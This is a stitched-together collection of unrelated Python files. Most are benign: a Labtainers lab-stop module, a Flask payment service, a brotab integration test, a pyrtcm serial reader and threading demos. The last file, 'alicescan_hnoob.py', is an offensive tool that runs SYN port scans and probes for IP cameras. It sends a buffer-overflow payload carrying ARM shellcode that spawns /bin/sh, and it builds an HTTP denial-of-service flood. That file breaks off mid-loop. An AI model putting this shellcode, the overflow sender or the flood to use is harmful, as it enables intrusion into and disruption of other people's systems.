return found_match_network, found_match_network_name
def AllContainersRunning(container):
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
if not IsContainerRunning(clone_full):
return False
return True
def IsContainerRunning(mycontainer_name):
cmd = 'docker ps -f id=%s' % mycontainer_name
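    # The argument may be a container ID (hex) or a container name; if it parses as hex,
    # filter docker ps by id, otherwise fall back to filtering by name below.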
try:
dumb = int(mycontainer_name, 16)
except:
cmd = 'docker ps -f name=%s' % mycontainer_name
try:
s = subprocess.check_output(shlex.split(cmd)).decode('utf-8')
except:
return False
if mycontainer_name in s:
return True
else:
return False
def ShouldBeRunning(start_config, container):
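    # In multi-user (server/client) deployments, only containers matching this host's role
    # are expected to be running; 'clones' deployments run everything.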
if start_config.multi_user is not None and start_config.multi_user != 'clones':
if start_config.multi_user == 'server' and container.client == 'yes':
return False
if start_config.multi_user == 'client' and container.client != 'yes':
return False
return True
def DoStopOne(start_config, labtainer_config, lab_path, name, container, zip_file_list, ignore_stop_error, results, keep_running):
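    # For one container (and any clones): gather configured artifacts, run Student.py to zip
    # the results, disconnect its networks, and stop it unless keep_running is set.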
labname = os.path.basename(lab_path)
#dumlog = os.path.join('/tmp', name+'.log')
#sys.stdout = open(dumlog, 'w')
#sys.stderr = sys.stdout
retval = True
mycontainer_name = container.full_name
container_user = container.user
container_password = container.password
mycontainer_image = container.image_name
haveContainer = AllContainersCreated(container)
logger.debug("AllContainersCreated for %s result (%s)" % (container.name, haveContainer))
    # IsContainerCreated returns FAILURE if the container does not exist
# error: can't stop non-existent container
if not haveContainer:
if ShouldBeRunning(start_config, container) and not ignore_stop_error:
logger.error("Container %s does not exist!\n" % mycontainer_name)
retval = False
elif container.tap == 'yes':
StopMyContainer(mycontainer_name, ignore_stop_error)
else:
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
if not IsContainerRunning(mycontainer_name):
if ShouldBeRunning(start_config, container):
if ignore_stop_error:
logger.debug("container %s not running\n" % (mycontainer_name))
else:
logger.error("container %s not running\n" % (mycontainer_name))
retval = False
continue
GatherOtherArtifacts(lab_path, name, mycontainer_name, container_user, container_password, ignore_stop_error)
# Before stopping a container, run 'Student.py'
# This will create zip file of the result
baseZipFilename, currentContainerZipFilename = CreateCopyChownZip(start_config, labtainer_config, name,
mycontainer_name, mycontainer_image, container_user, container_password, ignore_stop_error, keep_running)
if baseZipFilename is not None:
if currentContainerZipFilename is not None:
zip_file_list.append(currentContainerZipFilename)
else:
logger.debug('currentContainerZipFilename is None for container %s' % mycontainer_name)
logger.debug("baseZipFilename is (%s)" % baseZipFilename)
else:
logger.debug("baseZipFileName is None for container %s" % mycontainer_name)
#command = 'docker exec %s echo "%s\n" | sudo -S rmdir /tmp/.mylockdir 2>/dev/null' % (mycontainer_name, container_password)
command = 'docker exec %s sudo rmdir /tmp/.mylockdir 2>/dev/null' % (mycontainer_name)
os.system(command)
if not keep_running:
did_this = []
for mysubnet_name, mysubnet_ip in container.container_nets.items():
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
if subnet_name not in did_this:
disconnectNetworkResult = DisconnectNetworkFromContainer(mycontainer_name, subnet_name)
did_this.append(subnet_name)
# Stop the container
if not keep_running:
StopMyContainer(mycontainer_name, ignore_stop_error)
results.append(retval)
def SynchStop(start_config, run_container=None):
threads = []
now = datetime.datetime.now()
''' NOTE all prestop stdout will have same timestamp. '''
ts = now.strftime('%Y%m%d%H%M%S')
for name, container in start_config.containers.items():
if run_container is not None and container.full_name != run_container:
#print('not for me %s ' % run_container)
continue
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
t = threading.Thread(target=PreStop, args=[mycontainer_name, ts])
threads.append(t)
t.setName(name)
t.start()
logger.debug('prestop started on all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
def GatherZips(zip_file_list, labtainer_config, start_config, labname, lab_path):
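    # Combine the per-container zips (plus docs.zip, count.json and labtainer.log when present)
    # into a single <email>.<labname>.zip in the host transfer directory.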
mycwd = os.getcwd()
if len(zip_file_list) == 0:
logger.error('GatherZips called without any zips')
return
try:
base_filename = os.path.basename(zip_file_list[0])
except:
logger.error('No basefile found in %s' % zip_file_list[0])
return
baseZipFilename = base_filename.split('=')[0]
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
username = getpass.getuser()
xfer_dir = "/home/%s/%s" % (username, host_home_xfer)
try:
os.makedirs(xfer_dir)
except:
pass
# Create docs.zip in xfer_dir if COLLECT_DOCS is "yes"
if start_config.collect_docs.lower() == "yes":
docs_zip_file = "%s/docs.zip" % xfer_dir
logger.debug("Zipping docs directory to %s" % docs_zip_file)
docs_path = '%s/docs' % lab_path
if os.path.isdir(docs_path):
docs_zip_filelist = glob.glob('%s/*' % docs_path)
logger.debug(docs_zip_filelist)
# docs.zip file
docs_zipoutput = zipfile.ZipFile(docs_zip_file, "w")
# Go to the docs_path
os.chdir(docs_path)
for docs_fname in docs_zip_filelist:
docs_basefname = os.path.basename(docs_fname)
docs_zipoutput.write(docs_basefname, compress_type=zipfile.ZIP_DEFLATED)
# Note: DO NOT remove after the file is zipped
docs_zipoutput.close()
# Add docs.zip into the zip_file_list
zip_file_list.append(docs_zip_file)
else:
logger.debug('no docs at %s' % docs_path)
# Combine all the zip files
logger.debug("zip_file_list is ")
logger.debug(zip_file_list)
logger.debug("baseZipFilename is (%s)" % baseZipFilename)
combinedZipFilename = "%s/%s.zip" % (xfer_dir, baseZipFilename)
logger.debug("The combined zip filename is %s" % combinedZipFilename)
zipoutput = zipfile.ZipFile(combinedZipFilename, "w")
# Go to the xfer_dir
os.chdir(xfer_dir)
for fname in zip_file_list:
basefname = os.path.basename(fname)
zipoutput.write(basefname, compress_type=zipfile.ZIP_DEFLATED)
# Remove after the file is zipped
os.remove(basefname)
# Add count.json and labtainer.log (if they exist) to the zip file
count_path = LabCount.getPath('./', labname)
#print "count_path is %s" % count_path
if os.path.isfile(count_path):
parent = os.path.dirname(count_path)
os.chdir(mycwd)
os.chdir(parent)
fname = os.path.join('./', os.path.basename(count_path))
zipoutput.write(fname, compress_type=zipfile.ZIP_DEFLATED)
os.chdir(mycwd)
my_labtainer_log = os.path.join('./', 'labtainer.log')
if os.path.exists(my_labtainer_log):
zipoutput.write(my_labtainer_log, compress_type=zipfile.ZIP_DEFLATED)
zipoutput.close()
post_zip = os.path.join(lab_path, 'bin', 'postzip')
if os.path.isfile(post_zip):
cmd = "%s %s" % (post_zip, combinedZipFilename)
os.system(cmd)
os.chdir(mycwd)
def DoStop(start_config, labtainer_config, lab_path, ignore_stop_error, run_container=None, servers=None, clone_count=None, keep_running=False):
retval = True
labname = os.path.basename(lab_path)
logger.debug("DoStop Multiple Containers and/or multi-home networking, keep_running is %r" % keep_running)
SynchStop(start_config, run_container)
baseZipFilename = ""
zip_file_list = []
threads = []
results = []
for name, container in start_config.containers.items():
if run_container is not None and container.full_name != run_container:
#print('not for me %s ' % run_container)
continue
mycontainer_name = '%s.%s.student' % (labname, container.name)
t = threading.Thread(target=DoStopOne, args=(start_config, labtainer_config, lab_path,
name, container, zip_file_list, ignore_stop_error, results, keep_running))
threads.append(t)
t.setName(name)
t.start()
logger.debug('stopped all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
if not keep_running:
RemoveSubnets(start_config.subnets, ignore_stop_error)
if not ignore_stop_error:
if False in results:
logger.error('DoStopOne has at least one failure!')
sys.exit(1)
if len(zip_file_list) == 0:
if ignore_stop_error:
logger.debug('No zip files found')
else:
logger.error('No zip files found')
return None
''' Check for empty email identifier '''
if zip_file_list[0].startswith('.'):
        logger.error('Missing email for student, cannot gather artifacts')
return None
GatherZips(zip_file_list, labtainer_config, start_config, labname, lab_path)
return retval
# ignore_stop_error - set to 'False' : do not ignore error
# ignore_stop_error - set to 'True'  : ignore certain errors, since they may not be real errors,
#                                      e.g., the error from trying to stop a non-existent container
def StopLab(lab_path, ignore_stop_error, run_container=None, servers=None, clone_count=None, keep_running=False):
labname = os.path.basename(lab_path)
if labname.endswith('labtainer.grader'):
return None
myhomedir = os.environ['HOME']
logger.debug("keep_running is %r" % keep_running)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger, servers, clone_count)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
CreateHostHomeXfer(host_xfer_dir)
if DoStop(start_config, labtainer_config, lab_path, ignore_stop_error, run_container=run_container,
servers=servers, clone_count=clone_count, keep_running=keep_running):
# Inform user where results are stored
print("Results stored in directory: %s" % host_xfer_dir)
syncdir = os.path.join(os.getenv('LABTAINER_DIR'), 'scripts','labtainer-student', '.tmp', labname, 'sync')
try:
os.rmdir(syncdir)
except:
pass
return host_xfer_dir
def DoMoreterm(lab_path, container_name, clone_num=None, alt_name=None):
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger)
if container_name not in start_config.containers:
logger.error("Container %s not found. Container must be one of the following:" % container_name)
for container_name in start_config.containers:
print('\t%s' % container_name)
print("Usage: moreterm.py <lab> <container>")
return False
logger.debug('num terms is %d' % start_config.containers[container_name].terminals)
if clone_num is None:
mycontainer_name = '%s.%s.student' % (labname, container_name)
else:
mycontainer_name = '%s.%s-%d.student' % (labname, container_name, clone_num)
if alt_name is not None:
mycontainer_name = alt_name
if not IsContainerCreated(mycontainer_name):
logger.error('DoMoreTerm container %s not found' % mycontainer_name)
sys.exit(1)
if not IsContainerRunning(mycontainer_name):
logger.error("Container %s is not running!\n" % (mycontainer_name))
sys.exit(1)
if start_config.containers[container_name].terminals == -1:
logger.debug("No terminals supported for %s" % container_name)
return False
else:
spawn_command = "gnome-terminal -- docker exec -it %s bash -l -c bash&" % mycontainer_name
logger.debug("spawn_command is (%s)" % spawn_command)
os.system(spawn_command)
return True
def DoTransfer(lab_path, container_name, filename, direction):
    '''TBD: this is not tested and is likely broken'''
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
logger.debug("current working directory for %s" % mycwd)
logger.debug("current user's home directory for %s" % myhomedir)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
logger.debug('num terms is %d' % start_config.containers[container_name].terminals)
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
mycontainer_name = '%s.%s.student' % (labname, container_name)
if not IsContainerCreated(mycontainer_name):
logger.error('container %s not found' % mycontainer_name)
sys.exit(1)
if not IsContainerRunning(mycontainer_name):
logger.error("Container %s is not running!\n" % (mycontainer_name))
sys.exit(1)
container_user = ""
for name, container in start_config.containers.items():
if mycontainer_name == container.full_name:
container_user = container.user
if direction == "TOCONTAINER":
# Transfer from host to container
filename_path = '%s/%s' % (host_xfer_dir, filename)
logger.debug("File to transfer from host is (%s)" % filename_path)
if os.path.exists(filename_path) and os.path.isfile(filename_path):
# Copy file and chown it
command = 'docker cp %s %s:/home/%s/' % (filename_path, mycontainer_name, container_user)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOCONTAINER) file (%s) is %s" % (filename_path, result))
if result == FAILURE:
logger.error("Failed to copy file to container %s!\n" % mycontainer_name)
sys.exit(1)
command = 'docker exec %s sudo chown %s:%s /home/%s/%s' % (mycontainer_name, container_user, container_user, container_user, filename)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer chown file (%s) is %s" % (filename_path, result))
if result == FAILURE:
logger.error("Failed to set permission in container %s!\n" % mycontainer_name)
sys.exit(1)
else:
logger.error('Host does not have %s file' % filename_path)
sys.exit(1)
else:
# Transfer from container to host
command = 'docker cp %s:/home/%s/%s %s/' % (mycontainer_name, container_user, filename, host_xfer_dir)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOHOST) file (%s) is %s" % (filename, result))
if result == FAILURE:
logger.error("Failed to copy file from container %s!\n" % mycontainer_name)
sys.exit(1)
def CopyFilesToHost(lab_path, container_name, full_container_name, container_user):
labname = os.path.basename(lab_path)
isValidLab(lab_path)
config_path = os.path.join(lab_path,"config")
copy_path = os.path.join(config_path,"files_to_host.config")
logger.debug('CopyFilesToHost %s %s %s' % (labname, container_name, full_container_name))
logger.debug('CopyFilesToHost copypath %s' % copy_path)
if os.path.isfile(copy_path):
with open(copy_path) as fh:
for line in fh:
if not line.strip().startswith('#'):
try:
os.mkdir(os.path.join(os.getcwd(), labname))
except OSError as e:
#logger.error('could not mkdir %s in %s %s' % (labname, os.getcwd(),str(e)))
pass
                    container, file_name = line.split(':')
                    file_name = file_name.strip()
if container == container_name:
dest = os.path.join(os.getcwd(), labname, file_name)
command = 'docker cp %s:/home/%s/%s %s' % (full_container_name, container_user,
file_name.strip(), dest)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call DoTransfer copy (TOHOST) file (%s) is %s" % (file_name,
result))
if result == FAILURE:
logger.error("Failed to copy file from container %s!\n" % full_container_name)
sys.exit(1)
def GetContainerId(image):
command = "docker ps"
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('GetContainerId, Failed to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
docker_ps_output = output[0].decode('utf-8').splitlines()
for each_line in docker_ps_output:
# Skip empty line or the "CONTAINER ID" line - the header line returned by "docker ps"
            current_line = each_line.strip()
            if not current_line or current_line.startswith("CONTAINER"):
                continue
            parts = current_line.split()
if parts[1].startswith(image):
return parts[0]
return None
|
app.py
|
import os
import sys
import logging
import pika
import threading
import schedule
import time
from flask import Flask, make_response, request, jsonify, g
from src.database.pg import connect_to_db as connect_to_db
from src.credit_card.controllers import credit_card as cc_controllers
from src.payment.controllers import payment as payment_controllers
from src.payment.controllers import retry_failed_payments
from src.rabbitmq import rmq
PORT = int(os.getenv('PORT', 3344))
app = Flask(__name__)
app.register_blueprint(cc_controllers, url_prefix='/api/v1/card')
app.register_blueprint(payment_controllers, url_prefix='/api/v1/payment')
# Loggers
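# Reuse gunicorn's handlers and log level so application logs show up in gunicorn's output
# when the app is served by gunicorn.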
gunicorn_logger = logging.getLogger('gunicorn.error')
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
def start_rabbitMQ_consumer():
print(' * Starting RabbitMQ')
channel = rmq.connect()
rmq.consume(channel)
def start_scheduler():
print(' * Scheduler up and running.')
while True:
schedule.run_pending()
time.sleep(1)
@app.before_request
def get_db():
app.logger.info('Opening connection...')
if 'db' not in g:
g.db = connect_to_db()
@app.teardown_appcontext
def teardown_db(exception):
db = g.pop('db', None)
if db is not None:
app.logger.info('Closing connection...')
db.close()
@app.errorhandler(404)
def not_found(e):
    return make_response(jsonify({'status': 'ERROR', 'msg': 'URI not found.'}), 404)
@app.errorhandler(405)
def method_not_allowed(e):
    return make_response(jsonify({'status': 'ERROR', 'msg': 'Method not allowed.'}), 405)
@app.errorhandler(500)
def internal_error(e):
app.logger.critical(e)
    return make_response(jsonify({'status': 'ERROR', 'msg': 'Oops... Something went wrong internally.'}), 500)
@app.route('/health')
def health():
cur = g.db.cursor()
cur.execute('SELECT 1+1 as sum', [])
if cur.fetchone()['sum'] == 2:
return make_response("Healthy :D\n", 200)
else:
return make_response("Not healthy :(\n", 500)
if __name__ == '__main__':
t1 = threading.Thread(target=start_rabbitMQ_consumer, args=[])
t1.start()
t2 = threading.Thread(target=start_scheduler, args=[])
t2.start()
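    # Register the periodic retry job; the scheduler thread started above runs it via run_pending().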
schedule.every(120).seconds.do(retry_failed_payments)
# schedule.every(120).minutes.do(retry_failed_payments)
app.run(debug=False, use_reloader=False, port=PORT)
|
test_integration.py
|
import os
import signal
import threading
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from subprocess import Popen
from subprocess import check_output
from unittest import TestCase
from urllib.parse import parse_qs
from urllib.parse import urlparse
import pytest
from brotab.api import api_must_ready
from brotab.inout import get_available_tcp_port
from brotab.inout import wait_net_service
from brotab.mediator.const import DEFAULT_MIN_HTTP_PORT
from brotab.tab import parse_tab_lines
def run(args):
return check_output(args, shell=True).decode('utf-8').strip().splitlines()
def git_root():
return run(['git rev-parse --show-toplevel'])[0]
def requires_integration_env():
value = os.environ.get('INTEGRATION_TEST')
return pytest.mark.skipif(
value is None,
reason=f"Skipped because INTEGRATION_TEST=1 is not set"
)
TIMEOUT = 60 # 15
ECHO_SERVER_PORT = 8087
class EchoRequestHandler(BaseHTTPRequestHandler):
"""
Sample URL:
localhost:9000?title=tab1&body=tab1
"""
def _get_str_arg(self, path, arg_name):
args = parse_qs(urlparse(path).query)
return ''.join(args.get(arg_name, ''))
def do_GET(self):
title = self._get_str_arg(self.path, 'title')
body = self._get_str_arg(self.path, 'body')
print('EchoServer received TITLE "%s" BODY "%s"' % (title, body))
self.send_response(200)
self.send_header("Content-Type", "text/html; charset=utf-8")
reply = ('<html><head><title>%s</title></head>'
'<body>%s</body></html>'
% (title, body)).encode('utf-8')
self.send_header("Content-Length", str(len(reply)))
self.end_headers()
self.wfile.write(reply)
# self.wfile.close()
ECHO_SERVER_HOST = 'localhost'
ECHO_SERVER_PORT = 9000
class EchoServer:
"""
This EchoServer is used to customize page title and content using URL
parameters.
"""
def __init__(self):
self._thread = None
self._server = None
def run(self, host=ECHO_SERVER_HOST, port=ECHO_SERVER_PORT):
self._server = HTTPServer((host, port), EchoRequestHandler)
self._thread = threading.Thread(
target=self._server.serve_forever, daemon=True)
self._thread.start()
def stop(self):
self._server.shutdown()
self._server.socket.close()
self._thread.join(TIMEOUT)
@staticmethod
def url(title='', body=''):
return 'http://%s:%s?title=%s&body=%s' % (
ECHO_SERVER_HOST, ECHO_SERVER_PORT, title, body)
class Brotab:
def __init__(self, target_hosts: str):
"""
target_hosts: e.g. 'localhost:4625,localhost:4626'
"""
self.targets = target_hosts
self.options = '--target %s' % self.targets if self.targets else ''
def list(self):
return run(f'bt {self.options} list')
def tabs(self):
return parse_tab_lines(self.list())
def open(self, window_id, url):
return run(f'echo "{url}" | bt {self.options} open {window_id}')
def active(self):
return run(f'bt {self.options} active')
def windows(self):
return run(f'bt {self.options} windows')
class Browser:
CMD = ''
CWD = ''
PROFILE = ''
def __init__(self):
print('CMD', self.CMD, 'CWD', self.CWD)
# Used a trick from here: https://stackoverflow.com/a/22582602/258421
os.makedirs('/dev/shm/%s' % self.PROFILE, exist_ok=True)
self._browser = Popen(self.CMD, shell=True,
cwd=self.CWD, preexec_fn=os.setsid)
print('PID', self._browser.pid)
wait_net_service('localhost', DEFAULT_MIN_HTTP_PORT, TIMEOUT)
print('init done PID', self._browser.pid)
def stop(self):
os.killpg(os.getpgid(self._browser.pid), signal.SIGTERM)
self._browser.wait(TIMEOUT)
@property
def pid(self):
return self._browser.pid
class Container:
NAME = 'chrome/chromium'
def __init__(self):
root = git_root()
self.guest_port = 4625
self.host_port = get_available_tcp_port()
display = os.environ.get('DISPLAY', ':0')
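        # Map a free host port to the mediator's fixed in-container port so tests can reach it.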
args = ['docker', 'run', '-v',
f'"{root}:/brotab"',
# '-p', '19222:9222',
'-p', f'{self.host_port}:{self.guest_port}',
'--detach --rm --cpuset-cpus 0',
'--memory 512mb -v /tmp/.X11-unix:/tmp/.X11-unix',
f'-e DISPLAY=unix{display}',
'-v /dev/shm:/dev/shm',
'brotab-integration']
cmd = ' '.join(args)
self.container_id = run(cmd)[0]
api_must_ready(self.host_port, self.NAME, 'a', client_timeout=3.0, startup_timeout=10.0)
def stop(self):
run(f'docker kill {self.container_id}')
def __enter__(self):
return self
def __exit__(self, type_, value, tb):
self.stop()
@property
def guest_addr(self):
return f'localhost:{self.guest_port}'
@property
def host_addr(self):
return f'localhost:{self.host_port}'
def echo_url(self, title=None, body=None):
url = f'http://{self.guest_addr}/echo?'
url += 'title=' + title if title else ''
url += '&body=' + body if body else ''
return url
def targets(containers: [Container]) -> str:
return ','.join([c.host_addr for c in containers])
@requires_integration_env()
class TestIntegration(TestCase):
def test_open_single(self):
with Container() as c:
bt = Brotab(targets([c]))
tabs = bt.list()
assert 'tab1' not in ''.join(tabs)
tab_ids = bt.open('a.1', c.echo_url('tab1'))
assert len(tab_ids) == 1
tabs = bt.list()
assert 'tab1' in ''.join(tabs)
assert tab_ids[0] in ''.join(tabs)
def test_active_tabs(self):
with Container() as c:
bt = Brotab(targets([c]))
bt.open('a.1', c.echo_url('tab1'))
bt.open('a.1', c.echo_url('tab2'))
bt.open('a.1', c.echo_url('tab3'))
assert len(bt.tabs()) == 4
active_id = bt.active()[0].split('\t')[0]
assert active_id == bt.tabs()[-1].id
@pytest.mark.skip
class TestChromium(TestCase):
def setUp(self):
self._echo_server = EchoServer()
self._echo_server.run()
self.addCleanup(self._echo_server.stop)
self._browser = Chromium()
# self._browser = Firefox()
# self.addCleanup(self._browser.stop)
print('SETUP DONE:', self._browser.pid)
def tearDown(self):
print('CHROME', self._browser)
print('BLOCK DONE')
def test_open_single(self):
print('SINGLE START')
tabs = Brotab.list()
assert 'tab1' not in ''.join(tabs)
Brotab.open('a.1', EchoServer.url('tab1'))
tabs = Brotab.list()
assert 'tab1' in ''.join(tabs)
print('SINGLE END')
def test_active_tabs(self):
Brotab.open('a.1', EchoServer.url('tab1'))
Brotab.open('a.2', EchoServer.url('tab2'))
Brotab.open('a.3', EchoServer.url('tab3'))
assert len(Brotab.tabs()) == 4
assert Brotab.active()[0] == Brotab.tabs()[-1].id
if __name__ == '__main__':
server = EchoServer()
server.run(ECHO_SERVER_HOST, ECHO_SERVER_PORT)
print('Running EchoServer at %s:%s. Press Enter to terminate' % (
ECHO_SERVER_HOST, ECHO_SERVER_PORT))
input()
|
rtcmserial.py
|
"""
rtcmserial.py
This example illustrates a simple implementation of a
'pseudo-concurrent' threaded RTCMMessage streaming utility.
(NB: Since Python implements a Global Interpreter Lock (GIL),
threads are not truly concurrent.)
It connects to the receiver's serial port and sets up a
RTCMReader read thread.
Created on 14 Feb 2022
:author: semuadmin
:copyright: SEMU Consulting © 2022
:license: BSD 3-Clause
"""
# pylint: disable=invalid-name
from sys import platform
from io import BufferedReader
from threading import Thread, Lock
from time import sleep
from serial import Serial
from pyrtcm import (
RTCMReader,
)
# initialise global variables
reading = False
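# 'reading' is the shared stop flag: the reader thread loops while it is True and the
# main block clears it to shut the thread down.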
def read_messages(stream, lock, rtcmreader):
"""
Reads, parses and prints out incoming rtcm messages
"""
# pylint: disable=unused-variable, broad-except
    while reading:
        if stream.in_waiting:
            try:
                # hold the lock only while reading so send_message() can interleave safely
                with lock:
                    (raw_data, parsed_data) = rtcmreader.read()
                if parsed_data:
                    print(parsed_data)
            except Exception as err:
                print(f"\n\nSomething went wrong {err}\n\n")
def start_thread(stream, lock, rtcmreader):
"""
Start read thread
"""
thr = Thread(target=read_messages, args=(stream, lock, rtcmreader), daemon=True)
thr.start()
return thr
def send_message(stream, lock, message):
"""
Send message to device
"""
lock.acquire()
stream.write(message.serialize())
lock.release()
if __name__ == "__main__":
# set port, baudrate and timeout to suit your device configuration
if platform == "win32": # Windows
port = "COM13"
elif platform == "darwin": # MacOS
port = "/dev/tty.usbmodem14101"
else: # Linux
port = "/dev/ttyACM1"
baudrate = 9600
timeout = 0.1
with Serial(port, baudrate, timeout=timeout) as ser:
# create rtcmReader instance, reading only rtcm messages
rtr = RTCMReader(BufferedReader(ser))
print("\nStarting read thread...\n")
reading = True
serial_lock = Lock()
read_thread = start_thread(ser, serial_lock, rtr)
print("\nPolling complete. Pausing for any final responses...\n")
sleep(1)
print("\nStopping reader thread...\n")
reading = False
read_thread.join()
print("\nProcessing Complete")
|
1.py
|
from multiprocessing import Process, freeze_support
def f():
print('hello world!')
if __name__ == '__main__':
freeze_support()
Process(target=f).start()
|
demo2.py
|
# -*- coding: utf-8 -*-
"""
Multithreading demo
Creating threads with the threading.Thread class
"""
from random import randint
from threading import Thread
from time import time, sleep
def download(filename):
    print('Starting download of %s...' % filename)
time_to_download = randint(5, 10)
sleep(time_to_download)
    print('%s download finished! Took %d seconds' % (filename, time_to_download))
def main():
start = time()
t1 = Thread(target=download, args=('Python从入门到住院.pdf',))
t1.start()
t2 = Thread(target=download, args=('Peking hot.avi',))
t2.start()
t1.join()
t2.join()
end = time()
    print('Total elapsed time: %.3f seconds' % (end - start))
if __name__ == '__main__':
main()
|
alicescan_hnoob.py
|
from scapy.all import *
import socket
import sys
import time
import os
import random
import argparse
from threading import Thread
import binascii
from multiprocessing.dummy import Pool as ThreadPool
# Project Alice #1 Port Scan
def check(dest, port, services):
def umast():
scanned = []
_port_checked = sr1(IP(dst=dest)/TCP(dport=int(port), sport=555), timeout=0.5, verbose=0)
if _port_checked != None:
if _port_checked.haslayer(TCP):
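                # TCP flags value 18 == 0x12 == SYN+ACK, i.e. the port answered our SYN probe.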
if _port_checked[TCP].flags == 18:
state = "Opened"
def get(dest, port):
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
sock.send("bytes\r\n".encode())
#sock.send("byte1\r\n".encode())
try:
sock.settimeout(5)
data = sock.recv(14812421).decode()
return data
except:
data = "None"
return data
#print(state)
#print(services)
if int(port) == 80:
if services == "ip-camera-find":
print("[*] Searching %s for cameras. . . " %(dest,))
def check(IP, port):
database = ["control/camerainfo"]
#print("18912794821794812789421")
for contents in database:
print("[*] Requesting: %s "%(database[0]) + "through IP: %s " %(socket.gethostbyname(IP)))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
#print(port)
sock.connect((IP, int(port)))
payload = "GET /%s HTTP/1.1\r\n" % (contents)
payload += "Accept: */*\r\n"
payload += "User-Agent: Xenu Link Sleuth/1.3.8\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
#print(payload)
sock.send(payload.encode())
rcv = sock.recv(1481243).decode()
return rcv
check = check(IP=dest, port=port)
print("\x0A")
if "200 OK" in check:
print("[+] IP Camera Discovered!")
print("\x0A")
elif services == "enc-bof-allvers":
print("[*] Creating mutliple shellcodes + broken encoders . . .")
def create_code(amount):
buff = []
while len(buff) < 4:
buff.append("A" * amount + "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68")
return buff
create = create_code(amount=100)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
for bytes in create:
print("[*] Sending total bytes: %s " %(len(bytes)) + " in bits: %s " %(len(bytes)*8))
sock.send(bytes.encode())
print("[*] Sending invalid encoders .. . ")
def create_socket(IPv4, IPv6):
if IPv4 != False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
return sock
else:
                                    sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
return sock
sock.close()
sock2 = create_socket(IPv4=True, IPv6=False)
sock2.connect((dest, int(port)))
#payload += "Accept-Encoding: 'doar-e, ftw, imo, ,'"
payload = "GET / HTTP/1.1\r\n"
payload += "Accept: */*\r\n"
payload += f"User-Agent: Alice Project Hnoob/20.1.8/x64-bit/{os.name}/Webbrowser-socket-crawler\r\n"
payload += "Host: %s \r\n" %(dest,)
payload += "Accept-Encoding: 'doar-e, ftw, imo, ,'"
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock2.send(payload.encode())
data = sock2.recv(18124).decode()
print('''
Bytes:%d
Bits: %d
----------
Hexadecimal: %s ====> %s ''' %(len(data), len(data)*8, binascii.hexlify(data.encode()), binascii.unhexlify(binascii.hexlify(data.encode()))))
elif services == "http-dos":
user_agents = ["Alice Webkit/x64", "Alice//x64", "Alice WIN-NT/compt/Firefox/x64", "Linux /x86/Firefox", "Webcrawler-Allice Web/kit", "Alice Project Hnoob/20.1.8/x64-bit/wbbsocketcrawler"]
print("[*] Preparing to attack ==> %s " %(dest,) + " | Press CTRL+C Whereever you want to stop!")
def create_socket(IPv4, IPv6):
if IPv4 != False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
return sock
socks = create_socket(IPv4=True, IPv6=False)
socks.connect((dest, int(port)))
payloads = f"GET /{64 * 120 + 256 - 8 - 1 + 4} HTTP/1.1\r\n"
payloads += "Accept: */*\r\n"
payloads += f"User-Agent: {random.choice(user_agents)}\r\n"
payloads += "Host: %s \r\n" %(dest,)
payloads += "Accept-Encoding: %d \r\n" %(64 * 120 + 256 - 8 - 1 + 4)
payloads += "Cache-Control: no-cache\r\n\r\n\r\n"
payload = []
gathered = 0
while len(payload) < 500:
payload.append(payloads)
try:
for xz in range(random.randint(10000, 200000)):
for payloads in payload:
try:
#print("[*] Sending => %d bytes" %(len(payloads)))
